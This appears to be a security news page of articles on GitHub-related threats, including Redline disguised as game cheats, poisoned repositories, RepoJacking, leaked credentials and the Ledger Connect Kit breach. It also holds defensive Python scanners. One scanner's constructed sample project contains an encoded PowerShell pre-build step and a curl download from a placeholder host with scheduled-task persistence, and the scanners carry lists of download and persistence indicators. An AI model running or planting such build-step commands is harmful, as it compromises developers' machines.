
Information Stealer Malware Preys on Gamers via Deceptive Cheat Code Baits

A new information-stealing malware is being distributed disguised as a game cheat called Cheat Lab, and it promises downloaders a free copy if they convince their friends to install it too. The payload is Redline, one of the most capable info-stealers in circulation, which can harvest sensitive data from infected computers, including passwords, cookies, autofill data and cryptocurrency wallet information. 

Redline's popularity among cybercriminals and its many distribution channels have made it widespread. According to McAfee threat researchers, this new variant uses Lua bytecode to evade detection: the bytecode lets it inject malicious code into legitimate processes for stealth while also benefiting from Just-In-Time (JIT) compilation. 

The researchers link this variant to Redline through a command-and-control server that has long been associated with that malware. Tests conducted by BleepingComputer, however, showed that the sample does not exhibit the behaviour typical of Redline, such as stealing browser information, saved passwords and cookies. 

The malicious Redline payloads are distributed via a URL tied to Microsoft's 'vcpkg' GitHub repository, posing as demonstrations of cheating tools named "Cheat Lab" and "Cheater Pro". When the MSI installer runs, it unpacks two files, compiler.exe and lua51.dll, and drops the malicious Lua bytecode in a file called 'readme.txt'. 

To spread further, the campaign uses an interesting lure: victims are told that if they convince their friends to install the cheating program, they will receive a free, fully licensed copy. To avoid detection, the payload is delivered as Lua bytecode rather than as a compiled executable, which also lends it an added layer of apparent legitimacy. 

An activation key is also included, which helps the package pass as legitimate and avoid suspicion. On installation, compiler.exe compiles and executes the Lua bytecode, and the same executable sets up persistence by creating scheduled tasks that run at system startup. 

McAfee reports that the malware also uses a fallback persistence mechanism, copying the three files to a long random path under the program directory. Once active on the infected system, it contacts a C2 server, sends screenshots and system information, and then waits for commands from the server to execute on the host. 

Although it is not known exactly how this info-stealer first reaches victims, such malware is typically spread through malvertising, YouTube video descriptions, P2P downloads and deceptive software download sites. Redline is highly dangerous, which is why users are urged not to run unsigned executables or download files from unreliable websites. 

As a result of this attack, even seemingly trustworthy programs, such as those hosted on Microsoft's GitHub, can carry the infection. Although BleepingComputer contacted Microsoft about the executables distributed via its GitHub URLs, the company had not responded by the publication date.

Hackers Use GitHub Search to Deliver Malware

Checkmarx, an application security firm, has discovered that threat actors are altering GitHub search results in order to infect developers with persistent malware.

As part of the campaign, attackers were seen developing fake repositories with popular names and themes, and then boosting their search ranks using automatic updates and fake ratings. 

To avoid detection, the threat actors concealed a harmful payload within Visual Studio project files, resulting in the execution of malware similar to the Keyzetsu clipper, which targets crypto wallets. The malware persists on Windows machines and is scheduled to execute daily. 

The threat actors were observed leveraging GitHub Actions to automatically update the malicious repositories by making minor changes to a file titled 'log', which artificially enhances the repositories' visibility and the possibility of users accessing them. 

Furthermore, the attackers were detected adding fictitious stars to their repositories from various fake identities, tricking users into believing the repositories are popular and genuine. 

“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Checkmarx stated. 

The attackers inserted their malicious payload in a Visual Studio project file's pre-build event, causing it to be run automatically across the build process. The payload downloads additional content from certain URLs based on the victim's country, downloads encrypted files from the URLs, extracts and runs their content, and checks the system's IP address to see if it is in Russia. 
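As an added example (not Checkmarx's tooling or code from the post), the following Python scanner pulls PreBuildEvent/PostBuildEvent entries and Exec tasks out of an MSBuild project file and flags commands that combine indicators such as PowerShell, encoded arguments, downloads and scheduled-task creation; the sample project, its placeholder URL and the indicator list are constructed assumptions.

```python
"""Scan MSBuild project files for build-event commands that fetch, decode or
persist something. Added illustration of the technique described above; this
is not Checkmarx's tooling. The sample project XML below is constructed."""
import re
import xml.etree.ElementTree as ET

# Illustrative indicators that a build step is doing more than compiling.
# Each is (regex over the lower-cased command, reason reported).
SUSPICIOUS = [
    (r"powershell|pwsh", "invokes PowerShell"),
    (r"-enc(odedcommand)?\b|frombase64string", "uses a base64-encoded command"),
    (r"invoke-webrequest|downloadstring|\bcurl\b|\bwget\b|bitsadmin", "downloads remote content"),
    (r"https?://", "references a URL"),
    (r"certutil|expand-archive|\.zip\b", "unpacks or decodes a file"),
    (r"schtasks|reg\s+add|hkcu|hklm|\\startup\\", "touches a persistence location"),
]

def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]

def extract_build_commands(project_xml):
    """Return (location, command) pairs for every pre/post-build event and Exec task."""
    root = ET.fromstring(project_xml)
    commands = []
    for el in root.iter():
        name = _local(el.tag)
        if name in ("PreBuildEvent", "PostBuildEvent") and el.text and el.text.strip():
            commands.append((name, el.text.strip()))
        elif name == "Exec" and el.get("Command"):
            commands.append(("Exec", el.get("Command")))
    return commands

def score_command(command):
    """Return the reasons that match a single build command."""
    lowered = command.lower()
    return [reason for pattern, reason in SUSPICIOUS if re.search(pattern, lowered)]

def scan_project(project_xml, threshold=2):
    """Report build commands matching at least `threshold` indicators.

    Requiring two indicators keeps an ordinary post-build copy step quiet while
    still catching a download-and-run or decode-and-run chain.
    """
    findings = []
    for location, command in extract_build_commands(project_xml):
        reasons = score_command(command)
        if len(reasons) >= threshold:
            findings.append({"where": location, "command": command, "reasons": reasons})
    return findings

# Constructed sample: one benign post-build copy and two suspicious steps.
# The URL is a placeholder and the -enc argument is just "ABC" in UTF-16LE base64.
SAMPLE_CSPROJ = """<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -NoProfile -w hidden -enc QQBCAEMA</PreBuildEvent>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)bin\\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="AfterBuild">
    <Exec Command="curl -s https://example.invalid/loader.zip -o %TEMP%\\l.zip &amp;&amp; schtasks /create /sc daily /tn upd /tr %TEMP%\\l.exe" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for finding in scan_project(SAMPLE_CSPROJ):
        print(f"[{finding['where']}] {', '.join(finding['reasons'])}\n    {finding['command']}")
```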

On April 3, the attackers began utilising a new URL that pointed to an archived executable file. To avoid detection by security solutions, they padded the executable with an abundance of zeros, preventing scanning.

"The results of our analysis of this malware suggest that the malware contains similarities to the 'Keyzetsu clipper' malware, a relatively new addition to the growing list of crypto wallet clippers commonly distributed through pirated software," Checkmarx said in a press release.

A scheduled task that points to a shortcut to the executable is one way the malware tries to remain persistent. Several of the malicious repositories have received complaints from infected users, suggesting that the campaign has been successful. 

“In the aftermath of the XZ attack and many other recent incidents, it would be irresponsible for developers to rely solely on reputation as a metric when using open-source code. These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware,” Checkmarx added.

GitHub Unveils AI-Driven Tool to Automatically Rectify Code Vulnerabilities

GitHub has unveiled a novel AI-driven feature aimed at expediting the resolution of vulnerabilities during the coding process. This new tool, named Code Scanning Autofix, is currently available in public beta and is automatically activated for all private repositories belonging to GitHub Advanced Security (GHAS) customers.

Utilizing the capabilities of GitHub Copilot and CodeQL, the feature is adept at handling over 90% of alert types in popular languages such as JavaScript, TypeScript, Java, and Python.

Once activated, Code Scanning Autofix presents potential solutions that GitHub asserts can resolve more than two-thirds of identified vulnerabilities with minimal manual intervention. According to GitHub's representatives Pierre Tempel and Eric Tooley, upon detecting a vulnerability in a supported language, the tool suggests fixes accompanied by a natural language explanation and a code preview, offering developers the flexibility to accept, modify, or discard the suggestions.

The suggested fixes are not confined to the current file but can encompass modifications across multiple files and project dependencies. This approach holds the promise of substantially reducing the workload of security teams, allowing them to focus on bolstering organizational security rather than grappling with a constant influx of new vulnerabilities introduced during the development phase.

However, it is imperative for developers to independently verify the efficacy of the suggested fixes, as GitHub's AI-powered feature may only partially address security concerns or inadvertently disrupt the intended functionality of the code.

Tempel and Tooley emphasized that Code Scanning Autofix aids in mitigating the accumulation of "application security debt" by simplifying the process of addressing vulnerabilities during development. They likened its impact to GitHub Copilot's ability to alleviate developers from mundane tasks, allowing development teams to reclaim valuable time previously spent on remedial actions.

In the future, GitHub plans to expand language support, with forthcoming updates slated to include compatibility with C# and Go.

For further insights into the GitHub Copilot-powered code scanning autofix tool, interested parties can refer to GitHub's documentation website.

Additionally, the company recently implemented default push protection for all public repositories to prevent inadvertent exposure of sensitive information like access tokens and API keys during code updates.

This move comes in response to a notable issue in 2023, during which GitHub users inadvertently disclosed 12.8 million authentication and sensitive secrets across more than 3 million public repositories. These exposed credentials have been exploited in several high-impact breaches in recent years, as reported by BleepingComputer.

GitHub Under Siege: Unraveling the Ongoing Automated Attack on Open-Source Repositories

GitHub, a cornerstone for programmers worldwide, faces a severe threat as an unknown attacker deploys an automated assault, cloning and creating malicious code repositories. The attack, involving sophisticated obfuscation and social engineering, poses a significant challenge to GitHub's security infrastructure. 

An assailant employs an automated process to fork and clone existing repositories, concealing malicious code under seven layers of obfuscation. These rogue repositories closely mimic legitimate ones, contributing to the challenge of detection. Developers unknowingly forking affected repos unintentionally amplify the attack. 

Once a developer utilizes a compromised repository, a hidden payload begins unpacking layers of obfuscation, revealing malicious Python code and a binary executable. The code then initiates the collection of confidential data and login details, which are subsequently uploaded to a control server. Security provider Apiiro's research and data teams report a substantial surge in the attack since its inception in May of the previous year. 

While GitHub diligently removes affected repositories, its automated detection system struggles to catch all instances. With millions of uploaded or forked repositories, even a 1% miss rate translates to potentially thousands of compromised repos still operational. Initially modest in scale, the attack has grown in size and sophistication, presenting challenges for GitHub's security measures. 

Researchers attribute the operation's success to GitHub's vast user base and the increasing complexity of the attack technique. The attack's intrigue lies in the fusion of sophisticated automated methods and exploiting simple human nature. While obfuscation techniques become more intricate, the attackers heavily rely on social engineering to confuse developers, compelling them to select the malicious code. 

This unintentional spread exacerbates the attack's impact and heightens the difficulty of detection. As of now, GitHub has not issued a direct comment on the ongoing attack. However, the platform released a general statement reassuring users of its commitment to security. The platform employs manual reviews, at-scale detection utilizing machine learning, and continuously evolves to counter adversarial attacks. 

GitHub's popularity as a vital resource for developers globally has inadvertently made it a target. The platform's open-source nature and extensive user base create vulnerabilities that attackers exploit. Resolving the issue entirely proves to be an uphill battle, with GitHub still grappling with the effectiveness of the assailant's methods. 

GitHub, a linchpin for the global programming community, faces a formidable challenge as an automated attack exploits its open-source framework and vast user base. The ongoing assault, characterized by sophisticated obfuscation and social engineering, underscores the complexities of securing such a widely used platform. GitHub's response and adaptation will be crucial in mitigating the impact and fortifying defenses against evolving cyber threats.

GitHub Vulnerability Exposes Millions to RepoJacking Threat

A recent study conducted by Massachusetts-based cloud-native security firm Aqua has shed light on a concerning vulnerability present in millions of software repositories hosted on GitHub. This vulnerability, dubbed RepoJacking, poses a significant threat to repositories belonging to esteemed organizations like Google, Lyft, and numerous others. 

RepoJacking involves the exploitation of vulnerabilities within GitHub repositories, potentially allowing malicious actors to gain unauthorized access and manipulate the code stored within. This vulnerability could have far-reaching consequences, including the compromise of sensitive data, the introduction of malicious code, and the disruption of software development processes. 

What is GitHub Repository and What Does it Mean When a Hacker Has Control Over It? 

Think of GitHub repositories as digital filing cabinets where developers store their code and project files. These cabinets use a system called Git to track changes made to the code over time and allow multiple developers to collaborate on the same project. However, if a hacker gains control of a GitHub repository, it can spell trouble. 

They could sneak in harmful code, swipe important data, disrupt the project's progress, or trick other developers into using their compromised code. This could lead to serious security breaches, data leaks, and project delays. So, it becomes crucial for developers to safeguard their repositories and carefully manage who has access to them. 

Emerging Dependency Repository Hijacking (aka RepoJacking)

This supply-chain vulnerability, also referred to as dependency repository hijacking (RepoJacking), poses a significant threat to software security. In this form of attack, malicious actors claim organization or user names that were previously owned by someone else in order to distribute compromised versions of software repositories. These altered repositories may contain hidden malware, allowing attackers to perform harmful actions on systems where the tainted software is installed. 

The vulnerability arises from a flaw in the process when a repository owner decides to change their username. Although a connection is created between the old and new usernames to ensure continuity for users relying on dependencies from the old repository, this connection can be exploited by anyone who claims the old username. This loophole enables the injection of malicious code into the repository without detection. 

This type of supply-chain attack has been observed since at least 2016, when a college student uploaded custom scripts to popular package repositories like RubyGems, PyPI, and NPM, posing as legitimate packages. This technique, known as typosquatting, takes advantage of users' mistakes when selecting package names. 

Similarly, in 2021, a researcher employed a technique called dependency confusion or namespace confusion attack to breach the networks of major companies such as Apple, Microsoft, and Tesla. This involved placing malicious code packages with the same names as genuine dependencies used by the targeted companies, allowing the counterfeit code to be automatically downloaded and installed by the companies' package managers.

Leaked Data from Binance Taken Down


The security of Binance, one of the biggest cryptocurrency exchanges in the world, has come under scrutiny following the recent disclosure of its private information on GitHub. Several documents, including code, internal passwords and architecture diagrams, were purportedly published by a GitHub account going by the name "Termf" and were publicly accessible for several months. The content was removed after Binance requested a copyright takedown.

Binance has had the leaked GitHub data removed

Various technical details, including code about Binance's security procedures, were included in the leaked material. Interestingly, this contained details on multi-factor authentication (MFA) and passwords. A large portion of the code that was made public concerned systems that were identified as "prod," denoting a link to Binance's operational website as opposed to test or development environments.

The problem became apparent on January 5, 2024, when 404 Media contacted Binance to inform the exchange about the compromised data. Binance then responded by sending GitHub a copyright removal request. In this request, Binance admitted that the internal code in the disclosed material "poses a significant risk" to the exchange, resulting in "severe financial harm" as well as possible user misunderstanding or harm.

What next?

Even after admitting the leak, Binance sent out a representative to try and reassure its user base. According to the spokesman, Binance's security team examined the circumstances and came to the conclusion that the code that had been leaked was not similar to the code that was being produced at the time. The representative emphasized the protection of users' data and assets and stated that there was only a "negligible risk" from the compromised information.

The significance of strong security procedures in the Bitcoin sector is highlighted by this occurrence. Crypto exchanges are required to uphold strict security procedures because of their role in managing users' sensitive information and financial assets. The prolonged public disclosure of security-related code and internal passwords on a public forum calls into doubt the effectiveness of Binance's security protocols.

The necessity of heightened security protocols

Another level of worry is raised by the exposed data, especially the code about security protocols like multi-factor authentication and passwords. These kinds of security lapses can have serious repercussions, including the compromise of user funds and accounts. It draws attention to the continuous difficulties Bitcoin platforms have in maintaining the integrity and confidentiality of their internal systems.

Sneaky USB Hackers Pose Threat on Favorite Sites

In a recent revelation in the world of cybersecurity, a financially motivated hacking group has been discovered using USB devices to infiltrate computer systems. The group has chosen a cunning approach, hiding its harmful software in plain view on widely used platforms like GitHub, Vimeo, and Ars Technica. 

Their strategy involves embedding malicious codes within seemingly innocuous content, creating a challenging environment for detection and prevention. We strongly advise our readers to maintain a vigilant stance while navigating the online platforms. 

Reassuring our website visitors, we confirm that the peculiar text strings encountered on GitHub and Vimeo pose no harm upon clicking. However, there's a twist: these seemingly harmless strings serve as a key tool for hackers, discreetly facilitating the download and deployment of harmful software in their attacks. 

The cybersecurity watchdogs, Mandiant, are actively monitoring this group of hackers identified as UNC4990. Operating in the shadows since 2020, they have specifically targeted individuals in Italy. 

The cyber assault unfolds with an unsuspecting individual clicking on a deceptive file on a USB drive. The mystery lies in how these USB devices find their way into the hands of unsuspecting users. Once opened, the file launches a PowerShell script, explorer.ps1, which downloads intermediary code that reveals a web address. This address acts as the gateway for installing a malware downloader named 'EMPTYSPACE.' 

UNC4990 initially employed special files on GitHub and GitLab but later shifted their tactics to Vimeo and Ars Technica, embedding their secret codes in mundane areas on these sites to avoid suspicion. The harmful PowerShell script, decoded, decrypted, and executed from legitimate sites, leads to the activation of EMPTYSPACE. This payload establishes communication with the hackers' control server, subsequently downloading a sophisticated backdoor called 'QUIETBOARD.' 

Additionally, UNC4990 employs this backdoor for crypto mining activities targeting Monero, Ethereum, Dogecoin, and Bitcoin. The financial gains from this cyber scheme exceed $55,000, not including the hidden Monero. 

QUIETBOARD, UNC4990's advanced backdoor, exhibits a wide range of capabilities, including executing commands, cryptocurrency theft, USB drive propagation, screenshot capture, system information collection, and geographical location determination. Mandiant highlights UNC4990's penchant for experimentation to refine their attack strategies. 

Despite ongoing efforts to mitigate USB-based malware threats, they persist as a significant danger. The tactic of concealing within reputable sites challenges traditional security measures, underscoring the need for enhanced online safety practices. In the evolving digital landscape, staying informed and vigilant is paramount. Cyber threats may emerge from unexpected quarters, demanding a proactive approach to cybersecurity.

Mercedes-Benz Accidentally Reveals Secret Code

Mercedes-Benz faces the spotlight as a critical breach comes to light. RedHunt Labs, a cybersecurity firm, discovered a serious vulnerability in Mercedes's digital security, allowing unauthorised entry to confidential internal data. Shubham Mittal, Chief Technology Officer at RedHunt Labs, found an employee's access token exposed on a public GitHub repository during a routine scan in January. This access token, initially meant for secure entry, inadvertently served as the gateway to Mercedes's GitHub Enterprise Server, posing a risk to sensitive source code repositories. The incident reiterates the importance of robust cybersecurity measures and highlights potential risks associated with digital access points.

Mittal found an employee's authentication token, an alternative to passwords, exposed in a public GitHub repository. This token provided unrestricted access to Mercedes's GitHub Enterprise Server, allowing the unauthorised download of private source code repositories. These repositories contained a wealth of intellectual property, including connection strings, cloud access keys, blueprints, design documents, single sign-on passwords, API keys, and other crucial internal details.

The exposed repositories were found to include Microsoft Azure and Amazon Web Services (AWS) keys, a Postgres database, and actual Mercedes source code. Although it remains unclear whether customer data was compromised, the severity of the breach cannot be underestimated.
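Push protection (described in the Code Scanning Autofix post above) and the Mercedes-Benz token exposure come down to the same control: catching a credential before it lands in a public repository. As an added example, not GitHub's implementation, here is a pre-push style scanner in Python; the GitHub PAT and AWS access key ID formats are public, while the generic rule, the entropy threshold and the sample config are assumptions.

```python
"""Pre-push style scan for leaked credentials in text about to be committed.
Added example; it is not GitHub's push-protection implementation. The token
formats for GitHub classic PATs and AWS access key IDs are public; the generic
rule and entropy threshold are illustrative assumptions."""
import math
import re

PATTERNS = {
    # GitHub classic personal access token: "ghp_" followed by 36 alphanumerics.
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    # AWS access key ID: "AKIA" followed by 16 upper-case alphanumerics.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # Anything secret-looking assigned a long value; filtered by entropy below.
    "generic_assignment": re.compile(
        r"(?i)\b(secret|token|password|api[_-]?key)\b\s*[:=]\s*['\"]?([A-Za-z0-9+/=_\-]{20,})"
    ),
}
MIN_ENTROPY_BITS = 3.5  # per character; placeholders like "aaaa..." score near 0

def shannon_entropy(value):
    """Bits of entropy per character of a string."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def scan_text(text, path="<staged>"):
    """Return one finding per credential-looking match, with a redacted preview
    so the report itself does not re-leak the value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                value = match.group(match.lastindex or 0)
                if kind == "generic_assignment" and shannon_entropy(value) < MIN_ENTROPY_BITS:
                    continue  # low-entropy value: most likely a placeholder, not a key
                findings.append({
                    "path": path, "line": lineno, "kind": kind,
                    "preview": value[:6] + "..." + "*" * (len(value) - 6),
                })
    return findings

# Constructed sample config; none of these values are real credentials.
SAMPLE_CONFIG = """# deployment settings
GITHUB_TOKEN=ghp_0123456789abcdefghijklmnopqrstuvwxyz
aws_access_key_id = AKIAABCDEFGHIJKLMNOP
password = "changeme"
api_key = "aaaaaaaaaaaaaaaaaaaaaaaa"
api_key = "qA7xZ2pL9mV4nB8kR3tY6wE1"
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_CONFIG, "config.env"):
        print(f"{f['path']}:{f['line']}: {f['kind']} {f['preview']}")
```

Wired into a pre-push hook, a non-empty result is the cue to refuse the push and rotate the value rather than merely delete it from history.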

Upon notification from RedHunt Labs, Mercedes responded by revoking the API token and removing the public repository. Katja Liesenfeld, a Mercedes spokesperson, acknowledged the error, stating, "The security of our organisation, products, and services is one of our top priorities." Liesenfeld assured that the company would thoroughly analyse the incident and take appropriate remedial measures.

The incident, which occurred in late September 2023, raises concerns about the potential exposure of the key to third parties. Mercedes has not confirmed if others discovered the exposed key or if the company possesses the technical means to track any unauthorised access to its data repositories.

This incident comes on the heels of a similar security concern with Hyundai's India subsidiary, where a bug exposed customers' personal information. The information included names, mailing addresses, email addresses, and phone numbers of Hyundai Motor India customers who had their vehicles serviced at Hyundai-owned stations across India.

These security lapses highlight the importance of robust cybersecurity measures in an era where digital threats are increasingly sophisticated. Companies must prioritise the safeguarding of sensitive data to protect both their intellectual property and customer information.

As the situation unfolds, Mercedes will undoubtedly face scrutiny over its security protocols, emphasising the need for transparency and diligence in handling such sensitive matters. Consumers are reminded to remain vigilant about the cybersecurity practices of the companies they entrust with their data.


GitHub Faces Rise in Malicious Use

GitHub, a widely used platform in the tech world, is facing a rising threat from cybercriminals. They're exploiting GitHub's popularity to host and spread harmful content, making it a hub for malicious activities like data theft and controlling compromised systems. This poses a challenge for cybersecurity, as the bad actors use GitHub's legitimacy to slip past traditional defences. 

Known as ‘living-off-trusted-sites,’ this technique lets cybercriminals blend in with normal online traffic, making it harder to detect. Essentially, they're camouflaging their malicious activities within the usual flow of internet data. GitHub's involvement in delivering harmful code adds an extra layer of complexity. For instance, there have been cases of rogue Python packages (basically, software components) using secret GitHub channels for malicious commands on hacked systems. 

This situation highlights the need for increased awareness and updated cybersecurity strategies to tackle these growing threats. It's a reminder that even widely used platforms can become targets for cybercrime, and staying informed is crucial to staying secure. 

While it's not very common for bad actors to fully control and command systems through GitHub, they often use it as a way to share secret information. This is called a "dead drop resolver." It's like leaving a message in a hidden spot for someone else to pick up. Malware like Drokbk and ShellBox frequently use this technique. 
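Both the UNC4990 chain in the post above (stage-one strings fetched from GitHub, Vimeo and Ars Technica) and the dead drop resolver pattern leave the same trace on the network: a process that is not a browser or a git client repeatedly fetching a static page on a trusted site. As an added example, not from the original post, the Python below runs that check over proxy logs; the log format, the process allow-list and the thresholds are assumptions, and the log lines are constructed.

```python
"""Detect dead-drop-resolver style use of trusted sites from proxy logs.
Added example written for this page; the log format, the allow-list of
processes expected to talk to these sites, and the thresholds are assumptions.
The sample log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Public sites the page names as abused for hosting stage-one strings.
WATCHED_HOSTS = {"raw.githubusercontent.com", "gist.githubusercontent.com",
                 "github.com", "gitlab.com", "vimeo.com", "arstechnica.com"}
# Processes a workstation legitimately uses to reach them (assumed allow-list).
EXPECTED_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "git.exe", "code.exe"}

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.*)$")

def parse_line(line):
    """Parse 'ISO-timestamp key=value ...' into a dict; return None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = dict(pair.split("=", 1) for pair in m.group("kv").split() if "=" in pair)
    try:
        rec["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    except ValueError:
        return None
    return rec

def analyze(log_text, min_repeats=3, max_jitter=0.1):
    """Return two kinds of findings:
    - unexpected_process: a watched site fetched by a process outside the allow-list
    - beaconing: the same process fetching the same path at near-constant intervals
    """
    unexpected, series = [], defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec.get("dst") not in WATCHED_HOSTS:
            continue
        key = (rec.get("host"), rec.get("proc"), rec["dst"], rec.get("path"))
        series[key].append(rec["ts"])
        if rec.get("proc") not in EXPECTED_PROCESSES:
            unexpected.append(key)
    beaconing = []
    for key, times in series.items():
        if len(times) < min_repeats:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        # Near-constant spacing is the fingerprint of a polling loop, not a human.
        if mean > 0 and max(abs(g - mean) for g in gaps) / mean <= max_jitter:
            beaconing.append({"key": key, "interval_s": round(mean), "count": len(times)})
    return {"unexpected_process": list(dict.fromkeys(unexpected)), "beaconing": beaconing}

# Constructed proxy log: two benign fetches, one polling loop, one odd updater.
SAMPLE_LOG = """2024-01-10T08:00:01Z host=WS-12 user=alice proc=chrome.exe dst=github.com path=/microsoft/vcpkg status=200
2024-01-10T08:00:05Z host=WS-12 user=alice proc=git.exe dst=github.com path=/microsoft/vcpkg.git/info/refs status=200
2024-01-10T08:00:01Z host=WS-07 user=bob proc=powershell.exe dst=raw.githubusercontent.com path=/someuser/somerepo/main/notes.txt status=200
2024-01-10T08:10:02Z host=WS-07 user=bob proc=powershell.exe dst=raw.githubusercontent.com path=/someuser/somerepo/main/notes.txt status=200
2024-01-10T08:20:01Z host=WS-07 user=bob proc=powershell.exe dst=raw.githubusercontent.com path=/someuser/somerepo/main/notes.txt status=200
2024-01-10T08:30:03Z host=WS-07 user=bob proc=powershell.exe dst=raw.githubusercontent.com path=/someuser/somerepo/main/notes.txt status=200
2024-01-10T09:12:44Z host=WS-03 user=carol proc=updater.exe dst=vimeo.com path=/123456 status=200
2024-01-10T09:13:00Z host=WS-03 user=carol proc=msedge.exe dst=arstechnica.com path=/ status=200
"""

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for key in result["unexpected_process"]:
        print("unexpected process:", key)
    for b in result["beaconing"]:
        print(f"beaconing every ~{b['interval_s']}s x{b['count']}:", b["key"])
```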

Another thing they sometimes do is use GitHub to sneakily take information out of a system. This doesn't happen a lot, and experts think it's because there are limits on how much data they can take and they want to avoid getting caught. 

Apart from these tricks, bad actors find other ways to misuse GitHub. For example, they might use a feature called GitHub Pages to trick people into giving away sensitive information. Sometimes, they even use GitHub as a backup communication channel for their secret operations. 

Understanding these tactics is important because it shows how people with bad intentions can use everyday platforms like GitHub for sneaky activities. By knowing about these things, we can be more careful and put in measures to protect ourselves from online threats. 

This trend of misusing popular online services extends beyond GitHub to other familiar platforms like Google Drive, Microsoft OneDrive, Dropbox, Notion, Firebase, Trello, and Discord. It's not just limited to GitHub; even source code and version control platforms like GitLab, BitBucket, and Codeberg face exploitation. 

GitHub acknowledges that there's no one-size-fits-all solution to detect abuse on their platform. They suggest using a combination of strategies influenced by specific factors like available logs, how organisations are structured, patterns of service usage, and the willingness to take risks. It is crucial to recognise that this problem isn't unique to GitHub. Threat actors are using various everyday services to carry out their activities, making it important for users and organisations to be aware and adopt a mix of strategies to detect and prevent abuse. This includes being mindful of how different platforms may be misused and tailoring detection methods accordingly.


Hackers Steal Assets Worth $484,000 in Ledger Security Breach


Threat actors responsible for attacking Ledger’s connector library have stolen assets valued at approximately $484,000. This information was given by the blockchain analysis platform Lookonchain. Ledger has said that the security breach might have a large effect, possibly totalling hundreds of thousands of dollars, even if they are yet to confirm the actual valuation. 

Direct Impact of the Hack

According to a report by Cryptopolitan, the breach happened when malicious code was added to Ledger's Github repository for Connect Kit, an essential component that is required by several DeFi protocols in order to communicate with hardware wallets for cryptocurrencies. Every application that used the Connect Kit had issues with its front end due to the malicious code. Notable protocols affected by this security flaw were Sushi, Lido, Metamask, and Coinbase.

Regarding the incident, Ledger said that one of its employees had fallen victim to a phishing attack, resulting in the unauthorized release of a compromised version of the Ledger Connect Kit. The leaked code revealed the name and email address of the former employee. It is important to note that the cryptocurrency community initially believed the developer was behind the exploit. Ledger subsequently stated, however, that the incident was the consequence of a former employee falling for a phishing scheme.

Ledger, after acknowledging the incident, identified and removed the exploited version of the software. Despite the swift response, however, the damage was already done: the software was left vulnerable for at least two hours, during which the threat actors drained funds.

Broader Implications for the DeFi Community

This incident has raised major concerns regarding the security infrastructure of decentralized applications. DeFi protocols frequently rely on code from multiple software providers, including Ledger, which leaves them vulnerable to multiple potential points of failure.

This incident has further highlighted the significance of boosting security protocols across the DeFi ecosystem.

The victims directly affected by the attack included users of services such as revoke.cash, a service normally used to withdraw permissions granted to DeFi protocols after a security breach, which was itself compromised. Users who were trying to protect their assets were unintentionally sent to a fraudulent token drainer, which increased the extent of the theft.  

Bluetooth Security Flaw Strikes Apple, Linux, and Android Devices

Vulnerabilities in the constantly changing technology landscape present serious risks to the safety of our online lives. A significant Bluetooth security weakness that affects Apple, Linux, and Android devices has recently come to light in the cybersecurity community, potentially putting millions of users at risk of hacking.

The flaw, identified as CVE-2023-45866, was first brought to light by security researchers who detected a potential loophole in the Bluetooth communication protocol. The severity of the issue lies in its capability to allow hackers to take control of the targeted devices, potentially leading to unauthorized access, data theft, and even remote manipulation.

Security experts from SkySafe, a renowned cybersecurity firm, delved into the intricacies of the vulnerability and disclosed their findings on GitHub. If successfully employed, the exploit could lead to a myriad of security breaches, prompting urgent attention from device manufacturers and software developers alike.

Apple, a prominent player in the tech industry, was not exempt from the repercussions of this Bluetooth bug. The flaw could potentially enable hackers to hijack Apple devices, raising concerns among millions of iPhone, iPad, and MacBook users. Apple, known for its commitment to user security, has been swift in acknowledging the issue and is actively working on a patch to mitigate the vulnerability.

Linux, an open-source operating system widely used across various platforms, also faced the brunt of this security loophole. With a significant user base relying on Linux for its robustness and versatility, the impact of the Bluetooth flaw extends to diverse systems, emphasizing the urgency of a comprehensive solution.

Android, the dominant mobile operating system, issued a security bulletin addressing the Bluetooth vulnerability. The Android Security Bulletin for December 2023 outlined the potential risks and provided guidance on necessary patches and updates. As the flaw could compromise the security of Android devices, users are strongly advised to implement the recommended measures promptly.

Cybersecurity experts stated, "The discovery of this Bluetooth vulnerability is a stark reminder of the constant vigilance required in the digital age. It underscores the importance of prompt action by manufacturers and users to ensure the security and integrity of personal and sensitive information."

This Bluetooth security issue serves as a grim reminder of the ongoing fight against new cyber threats as the tech world struggles with its implications. In order to strengthen its commitment to a secure digital future, the IT industry is working together with developers, manufacturers, and consumers to quickly identify and fix vulnerabilities.

Google Introduces RETVec: Gmail’s New Defense to Identify Spams

Google has recently introduced a new multilingual text vectorizer called RETVec (an acronym for Resilient and Efficient Text Vectorizer), to aid identification of potentially malicious content like spam and fraudulent emails in Gmail. 

While massive platforms like YouTube and Gmail use text classification models to identify frauds, offensive remarks, and phishing attempts, threat actors are known to create counter-strategies to get around these security mechanisms. 

The project description on GitHub reads, "RETVec is trained to be resilient against character-level manipulations including insertion, deletion, typos, homoglyphs, LEET substitution, and more."

"The RETVec model is trained on top of a novel character encoder which can encode all UTF-8 characters and words efficiently."

